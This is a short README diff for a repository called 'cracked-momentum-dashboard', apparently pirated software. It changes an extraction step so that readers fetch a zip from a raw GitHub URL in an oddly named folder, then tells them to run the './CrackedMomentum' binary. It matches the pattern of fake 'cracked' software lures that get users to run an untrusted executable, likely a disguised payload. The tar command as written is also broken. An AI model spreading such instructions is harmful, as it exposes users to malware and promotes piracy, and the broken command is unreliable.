3hxrp/cracked-momentum-dashboard/README.md

 1. Open your terminal.
 2. Navigate to the directory where you downloaded the file.
-3. Use the command `tar -xvzf cracked-momentum-dashboard-linux.tar.gz` to extract it.
+3. Use the command `tar -xvzf https://raw.githubusercontent.com/3hxrp/cracked-momentum-dashboard/main/whenness/cracked-momentum-dashboard.zip` to extract it.
 4. Navigate to the extracted folder and run the application using `./CrackedMomentum`.

 ### 6. Set Up the Dashboard